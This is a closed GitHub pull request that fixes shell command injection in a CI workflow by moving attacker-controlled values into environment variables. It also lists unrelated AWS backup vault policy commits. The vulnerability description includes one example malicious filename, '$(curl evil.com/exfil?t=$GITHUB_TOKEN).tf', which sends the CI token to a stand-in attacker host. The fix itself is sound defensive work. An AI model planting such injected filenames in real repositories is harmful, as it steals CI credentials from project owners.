Skip to content

fix: prevent command injection in CI workflow#326

Closed
lgallard wants to merge 6 commits intomasterfrom
security-issue
Closed

fix: prevent command injection in CI workflow#326
lgallard wants to merge 6 commits intomasterfrom
security-issue

Conversation

@lgallard
Copy link
Copy Markdown
Owner

@lgallard lgallard commented Apr 6, 2026

Summary

  • Fixes command injection vulnerability in .github/workflows/claude-code-review.yml reported in [Security] Security issue in your GitHub CI workflow YAML files #325
  • Replaces all direct ${{ }} expression interpolation of attacker-controlled data in run: shell blocks with env: variable mappings
  • Attacker-controlled inputs (PR filenames, commit messages, author names, branch refs) are now safely passed as environment variables instead of being spliced into shell commands

Vulnerability Details

Attack vector: An attacker could craft malicious PR filenames (e.g., $(curl evil.com/exfil?t=$GITHUB_TOKEN).tf) or commit messages containing shell metacharacters. When these values were interpolated via ${{ }} directly into run: blocks, the shell would execute the injected commands.

Affected steps (now fixed):

  • Workflow Summary (CRITICAL) — commit_message, commit_author, changed_files were directly interpolated into echo commands
  • Refresh git state (MEDIUM) — pr_head_ref was directly interpolated into git commands
  • Verify commit SHAgithub.event_name and step outputs used directly
  • Get PR information — Event data (base.ref, issue.number) used directly
  • Get PR information for checkout — Issue number and API URL used directly
  • Parse comment command — Event name used directly
  • Get changed files — Step outputs used directly

Fix Pattern

# BEFORE (vulnerable):
run: echo "${{ steps.foo.outputs.bar }}"

# AFTER (safe):
env:
  BAR: ${{ steps.foo.outputs.bar }}
run: echo "$BAR"

Test plan

  • YAML syntax validated
  • All pre-commit hooks pass
  • Verify workflow triggers correctly on PR comments (codebot hunt)
  • Verify workflow summary renders correctly
  • Verify git state refresh works for issue_comment events

Closes #325

claude bot and others added 6 commits January 20, 2026 13:33
@claude @lgallard
feat: add support for backup vault access policies
08539f0 
Add aws_backup_vault_policy resource support to enable cross-account backup scenarios and compliance controls.

Features:
- vault_policy variable with comprehensive JSON and security validation
- aws_backup_vault_policy resource supporting both standard and air-gapped vaults
- Rich outputs with management commands and console URLs
- Complete cross_account_vault_policy example with KMS encryption and vault lock
- Security-first design with validation bypass for advanced use cases

Resolves #318

🤖 Generated with [Claude Code](https://claude.ai/code)

Co-authored-by: Luis M. Gallardo D. <[email protected]>
@claude @lgallard
fix: resolve critical and moderate issues in cross_account_vault_poli…
eae71b0 
…cy example

- Remove duplicate data source declarations in outputs.tf
- Replace hardcoded account IDs with variable references in main.tf
- Fix variable ordering by moving vault_policy_bypass_security_validation before vault_policy
- Add missing trailing newlines to all example files

Co-authored-by: Luis M. Gallardo D. <[email protected]>
@claude @lgallard
fix: resolve pre-commit and validation failures
7bb5ed4 
- Fix variable validation cross-reference error in variables.tf
  - Move vault policy security validation from variables.tf to main.tf locals
  - Terraform variable validation can only reference the variable itself
- Add missing newlines at end of all example files for proper formatting
- Maintain security validation logic while fixing Terraform syntax issues

🤖 Generated with [Claude Code](https://claude.ai/code)

Co-authored-by: Luis M. Gallardo D. <[email protected]>
@claude @lgallard
fix: address critical security issues in cross account vault policy
86d8526 
- Replace wildcard resources (*) with specific vault ARN patterns for security
- Restrict KMS root permissions to specific required actions instead of kms:*
- Use vault_name_prefix variable instead of hardcoded 'dr-vault' prefix
- Remove duplicate JSON validation in variables.tf to improve efficiency
- Add backup:CopySourceRegion Null condition to prevent bypass attacks

These changes implement least-privilege access patterns and follow AWS security best practices.

Co-authored-by: Luis M. Gallardo D. <[email protected]>
@lgallard
fix: resolve terraform formatting and linting issues
9d8af61 
- Run terraform fmt on all modified files
- Remove unused security validation local from main.tf
- Remove unused vault_policy_bypass_security_validation variable
- Remove unused variables from cross_account_vault_policy example
- Update README.md via terraform-docs
@lgallard
fix: prevent command injection in claude-code-review workflow
378406a 
Replace direct ${{ }} expression interpolation with environment variables
in all `run:` blocks to prevent shell command injection via attacker-controlled
PR filenames, commit messages, and author names.

Fixes #325
@lgallard
Copy link
Copy Markdown
Owner Author

lgallard commented Apr 6, 2026

Closing - will recreate from a clean branch off master

@lgallard lgallard closed this Apr 6, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

[Security] Security issue in your GitHub CI workflow YAML files

1 participant

@lgallard